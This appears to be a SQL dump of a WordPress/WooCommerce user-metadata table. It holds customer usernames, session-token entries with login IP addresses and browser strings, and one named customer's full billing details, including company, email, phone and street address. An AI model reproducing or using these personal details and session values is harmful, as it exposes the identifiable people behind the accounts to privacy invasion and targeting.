INSERT INTO `wp_usermeta` VALUES (9793, 600, 'nickname', 'michael.boyer'); 
INSERT INTO `wp_usermeta` VALUES (9794, 600, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9795, 600, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9796, 600, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9797, 600, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9798, 600, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9799, 600, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9800, 600, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9801, 600, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9802, 600, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9803, 600, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9804, 600, '_yoast_wpseo_profile_updated', '1490782313'); 
INSERT INTO `wp_usermeta` VALUES (9805, 600, 'session_tokens', 'a:1:{s:64:"2959c42da507bb46d78c67fe46d7f3ae3f515771156f62ba81a7b69d63e11a00";a:4:{s:10:"expiration";i:1491991925;s:2:"ip";s:13:"149.32.192.39";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490782325;}}'); 
INSERT INTO `wp_usermeta` VALUES (9806, 601, 'nickname', 'chalkesx'); 
INSERT INTO `wp_usermeta` VALUES (9807, 601, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9808, 601, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9809, 601, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9810, 601, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9811, 601, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9812, 601, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9813, 601, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9814, 601, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9815, 601, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9816, 601, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9817, 601, '_yoast_wpseo_profile_updated', '1490788927'); 
INSERT INTO `wp_usermeta` VALUES (9818, 601, 'session_tokens', 'a:1:{s:64:"dd543ada2dd9b1bfa645b5866837e0acb61dacb749d3f49e5563fb9361ccea86";a:4:{s:10:"expiration";i:1491998536;s:2:"ip";s:13:"65.152.141.82";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0";s:5:"login";i:1490788936;}}'); 
INSERT INTO `wp_usermeta` VALUES (9819, 602, 'nickname', 'jlott'); 
INSERT INTO `wp_usermeta` VALUES (9820, 602, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9821, 602, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9822, 602, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9823, 602, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9824, 602, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9825, 602, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9826, 602, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9827, 602, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9828, 602, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9829, 602, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9830, 602, '_yoast_wpseo_profile_updated', '1490790306'); 
INSERT INTO `wp_usermeta` VALUES (9831, 602, 'session_tokens', 'a:1:{s:64:"f0e8d229cb939b7adef0ab2efab677a389bf8e16c0905789d0d1c8511841feff";a:4:{s:10:"expiration";i:1491999924;s:2:"ip";s:14:"209.142.140.76";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36";s:5:"login";i:1490790324;}}'); 
INSERT INTO `wp_usermeta` VALUES (9832, 291, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9833, 603, 'nickname', 'franklynn.shears'); 
INSERT INTO `wp_usermeta` VALUES (9834, 603, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9835, 603, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9836, 603, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9837, 603, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9838, 603, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9839, 603, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9840, 603, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9841, 603, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9842, 603, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9843, 603, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9844, 603, '_yoast_wpseo_profile_updated', '1490797394'); 
INSERT INTO `wp_usermeta` VALUES (9845, 603, 'session_tokens', 'a:1:{s:64:"ceff2d335cb2fcb67eb7b545e948242777a14d8dcc30bee4b14076ce31ad6145";a:4:{s:10:"expiration";i:1492007008;s:2:"ip";s:13:"205.174.22.25";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490797408;}}'); 
INSERT INTO `wp_usermeta` VALUES (9846, 591, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9847, 604, 'nickname', 'dbrindle'); 
INSERT INTO `wp_usermeta` VALUES (9848, 604, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9849, 604, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9850, 604, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9851, 604, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9852, 604, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9853, 604, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9854, 604, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9855, 604, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9856, 604, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9857, 604, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9858, 604, '_yoast_wpseo_profile_updated', '1490818396'); 
INSERT INTO `wp_usermeta` VALUES (9859, 604, 'session_tokens', 'a:1:{s:64:"d7ab349bd451cd224b259c35da9c4bb905063e759c1e5d77c26c9fe0d3307c2f";a:4:{s:10:"expiration";i:1492028005;s:2:"ip";s:14:"198.162.227.10";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490818405;}}'); 
INSERT INTO `wp_usermeta` VALUES (9860, 605, 'nickname', 'grigg'); 
INSERT INTO `wp_usermeta` VALUES (9861, 605, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9862, 605, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9863, 605, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9864, 605, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9865, 605, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9866, 605, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9867, 605, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9868, 605, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9869, 605, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9870, 605, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9871, 605, '_yoast_wpseo_profile_updated', '1490876917'); 
INSERT INTO `wp_usermeta` VALUES (9872, 605, 'session_tokens', 'a:1:{s:64:"edf039570536e3a749e3487f93db5dff22c3f37b07f265144301758b6662213e";a:4:{s:10:"expiration";i:1492086525;s:2:"ip";s:14:"143.72.236.226";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490876925;}}'); 
INSERT INTO `wp_usermeta` VALUES (9873, 606, 'nickname', 'reginald.k.nakazato.civ'); 
INSERT INTO `wp_usermeta` VALUES (9874, 606, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9875, 606, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9876, 606, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9877, 606, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9878, 606, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9879, 606, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9880, 606, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9881, 606, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9882, 606, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9883, 606, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9884, 606, '_yoast_wpseo_profile_updated', '1490878789'); 
INSERT INTO `wp_usermeta` VALUES (9886, 607, 'nickname', 'jason.richard2'); 
INSERT INTO `wp_usermeta` VALUES (9887, 607, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9888, 607, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9889, 607, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9890, 607, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9891, 607, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9892, 607, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9893, 607, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9894, 607, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9895, 607, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9896, 607, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9897, 607, '_yoast_wpseo_profile_updated', '1490880161'); 
INSERT INTO `wp_usermeta` VALUES (9898, 607, 'session_tokens', 'a:1:{s:64:"00f5b0f35e7ee4de955ad614504da97d7f2a3895276a1f50bc5f50a4c6804464";a:4:{s:10:"expiration";i:1492089779;s:2:"ip";s:15:"207.179.172.216";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490880179;}}'); 
INSERT INTO `wp_usermeta` VALUES (9899, 608, 'nickname', 'haynesms'); 
INSERT INTO `wp_usermeta` VALUES (9900, 608, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9901, 608, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9902, 608, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9903, 608, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9904, 608, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9905, 608, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9906, 608, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9907, 608, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9908, 608, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9909, 608, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9910, 608, '_yoast_wpseo_profile_updated', '1490882254'); 
INSERT INTO `wp_usermeta` VALUES (9911, 608, 'session_tokens', 'a:1:{s:64:"30914b2c89903409dfec80cf543af6188783859caa799255ec817e3c12a26e77";a:4:{s:10:"expiration";i:1492091863;s:2:"ip";s:15:"108.171.133.171";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490882263;}}'); 
INSERT INTO `wp_usermeta` VALUES (9912, 609, 'nickname', 'ptdietel'); 
INSERT INTO `wp_usermeta` VALUES (9913, 609, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9914, 609, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9915, 609, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9916, 609, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9917, 609, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9918, 609, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9919, 609, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9920, 609, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9921, 609, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9922, 609, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9923, 609, '_yoast_wpseo_profile_updated', '1490883112'); 
INSERT INTO `wp_usermeta` VALUES (9924, 609, 'session_tokens', 'a:2:{s:64:"b968e84696d687a2b754d0495c36ccacaaccc968fb4eb74c2f37cfc55687e3bb";a:4:{s:10:"expiration";i:1492092721;s:2:"ip";s:15:"108.171.131.171";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490883121;}s:64:"580edb283043fce5052a0359eeb0392c95609c8ab7ba31e51757c5836dd651e0";a:4:{s:10:"expiration";i:1492092746;s:2:"ip";s:15:"108.171.131.171";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490883146;}}'); 
INSERT INTO `wp_usermeta` VALUES (9925, 609, 'billing_first_name', 'Paul'); 
INSERT INTO `wp_usermeta` VALUES (9926, 609, 'billing_last_name', 'Dietel'); 
INSERT INTO `wp_usermeta` VALUES (9927, 609, 'billing_company', '3M'); 
INSERT INTO `wp_usermeta` VALUES (9928, 609, 'billing_email', 'ptdietel@mmm.com'); 
INSERT INTO `wp_usermeta` VALUES (9929, 609, 'billing_phone', '6517893437'); 
INSERT INTO `wp_usermeta` VALUES (9930, 609, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (9931, 609, 'billing_address_1', '3130 Lexington Ave S'); 
INSERT INTO `wp_usermeta` VALUES (9932, 609, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (9933, 609, 'billing_city', 'Eagan'); 
INSERT INTO `wp_usermeta` VALUES (9934, 609, 'billing_state', 'MN'); 
INSERT INTO `wp_usermeta` VALUES (9935, 609, 'billing_postcode', '55122'); 
INSERT INTO `wp_usermeta` VALUES (9936, 609, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9937, 607, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9938, 610, 'nickname', 'clray'); 
INSERT INTO `wp_usermeta` VALUES (9939, 610, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9940, 610, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9941, 610, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9942, 610, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9943, 610, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9944, 610, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9945, 610, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9946, 610, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9947, 610, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9948, 610, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9949, 610, '_yoast_wpseo_profile_updated', '1490896090'); 
INSERT INTO `wp_usermeta` VALUES (9950, 610, 'session_tokens', 'a:1:{s:64:"41b1d0bf3f96c2fdd6c8f5e13d6e0f3058e5817746c8f3f6c603f0a90d4e8df6";a:4:{s:10:"expiration";i:1492105698;s:2:"ip";s:14:"167.239.221.83";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490896098;}}'); 
INSERT INTO `wp_usermeta` VALUES (9951, 611, 'nickname', 'reception.restorex'); 
INSERT INTO `wp_usermeta` VALUES (9952, 611, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9953, 611, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9954, 611, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9955, 611, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9956, 611, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9957, 611, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9958, 611, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9959, 611, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9960, 611, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9961, 611, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9962, 611, '_yoast_wpseo_profile_updated', '1490909437'); 
INSERT INTO `wp_usermeta` VALUES (9963, 611, 'session_tokens', 'a:1:{s:64:"07cfe62f8a2cedb391721671187cf10120e7a18c0888f9eed07c12a0af7f2492";a:4:{s:10:"expiration";i:1492119046;s:2:"ip";s:12:"24.72.31.250";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36";s:5:"login";i:1490909446;}}'); 
INSERT INTO `wp_usermeta` VALUES (9964, 561, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9965, 612, 'nickname', 'donovan.kok.zj'); 
INSERT INTO `wp_usermeta` VALUES (9966, 612, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9967, 612, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9968, 612, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9969, 612, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9970, 612, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9971, 612, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9972, 612, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9973, 612, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9974, 612, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9975, 612, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9976, 612, '_yoast_wpseo_profile_updated', '1490932354'); 
INSERT INTO `wp_usermeta` VALUES (9977, 612, 'session_tokens', 'a:1:{s:64:"16dfa84cb2252e49646483a17f65106e441b877748459ebc839a0fb59bb76aee";a:4:{s:10:"expiration";i:1492141964;s:2:"ip";s:14:"164.78.250.170";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490932364;}}'); 
INSERT INTO `wp_usermeta` VALUES (9978, 613, 'nickname', 'sdssupport1'); 
INSERT INTO `wp_usermeta` VALUES (9979, 613, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9980, 613, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9981, 613, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9982, 613, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9983, 613, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9984, 613, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9985, 613, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9986, 613, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9987, 613, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9988, 613, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9989, 613, '_yoast_wpseo_profile_updated', '1490958934'); 
INSERT INTO `wp_usermeta` VALUES (9990, 613, 'session_tokens', 'a:1:{s:64:"d4c0afa7fe3c5c189bf2eb49e0a95d3c6caf0095941214843913aef8a3e00ab8";a:4:{s:10:"expiration";i:1492168545;s:2:"ip";s:11:"203.32.4.16";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1490958945;}}'); 
INSERT INTO `wp_usermeta` VALUES (9991, 614, 'nickname', 'michael.perry'); 
INSERT INTO `wp_usermeta` VALUES (9992, 614, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9993, 614, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9994, 614, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9995, 614, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9996, 614, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9997, 614, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9998, 614, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9999, 614, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10000, 614, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10001, 614, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10002, 614, '_yoast_wpseo_profile_updated', '1490967762'); 
INSERT INTO `wp_usermeta` VALUES (10003, 614, 'session_tokens', 'a:1:{s:64:"78ecb9b188abce5846529f3d7c3d2cfe28c86bfb26bbb0597231940da048ad40";a:4:{s:10:"expiration";i:1492177375;s:2:"ip";s:13:"161.150.176.3";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1490967775;}}'); 
INSERT INTO `wp_usermeta` VALUES (10004, 614, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (10005, 615, 'nickname', 'brian.m.dejan'); 
INSERT INTO `wp_usermeta` VALUES (10006, 615, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10007, 615, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10008, 615, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10009, 615, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10010, 615, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10011, 615, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10012, 615, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10013, 615, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10014, 615, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10015, 615, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10016, 615, '_yoast_wpseo_profile_updated', '1490993909'); 
INSERT INTO `wp_usermeta` VALUES (10017, 615, 'session_tokens', 'a:1:{s:64:"96385c04608869a5c99a5c5dece749a6b4fe7b23aa9f0c0234921913d1d73f3d";a:4:{s:10:"expiration";i:1492203517;s:2:"ip";s:12:"130.76.24.27";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490993917;}}'); 
INSERT INTO `wp_usermeta` VALUES (10018, 616, 'nickname', 'ramiruw'); 
INSERT INTO `wp_usermeta` VALUES (10019, 616, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10020, 616, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10021, 616, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10022, 616, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10023, 616, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10024, 616, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10025, 616, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10026, 616, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10027, 616, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10028, 616, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10029, 616, '_yoast_wpseo_profile_updated', '1491178604'); 
INSERT INTO `wp_usermeta` VALUES (10030, 616, 'session_tokens', 'a:1:{s:64:"e03a154d09552c5c12c0b11273c8ee019cfe41b90c9797024da656a21933ec6c";a:4:{s:10:"expiration";i:1492388219;s:2:"ip";s:13:"189.238.5.231";s:2:"ua";s:137:"Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1";s:5:"login";i:1491178619;}}'); 
INSERT INTO `wp_usermeta` VALUES (10031, 456, 'last_update', '1491223685'); 
INSERT INTO `wp_usermeta` VALUES (10032, 617, 'nickname', 'monicam'); 
INSERT INTO `wp_usermeta` VALUES (10033, 617, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10034, 617, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10035, 617, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10036, 617, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10037, 617, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10038, 617, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10039, 617, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10040, 617, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10041, 617, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10042, 617, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10043, 617, '_yoast_wpseo_profile_updated', '1491238687'); 
INSERT INTO `wp_usermeta` VALUES (10044, 617, 'session_tokens', 'a:1:{s:64:"38d5a9bf3822a814dd7b32529a530c55cce24166b09edc6f9b7f9d756fbd3850";a:4:{s:10:"expiration";i:1492448297;s:2:"ip";s:14:"12.203.177.162";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1491238697;}}'); 
INSERT INTO `wp_usermeta` VALUES (10045, 618, 'nickname', 'c.coleman'); 
INSERT INTO `wp_usermeta` VALUES (10046, 618, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10047, 618, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10048, 618, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10049, 618, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10050, 618, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10051, 618, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10052, 618, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10053, 618, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10054, 618, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10055, 618, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10056, 618, '_yoast_wpseo_profile_updated', '1491240753'); 
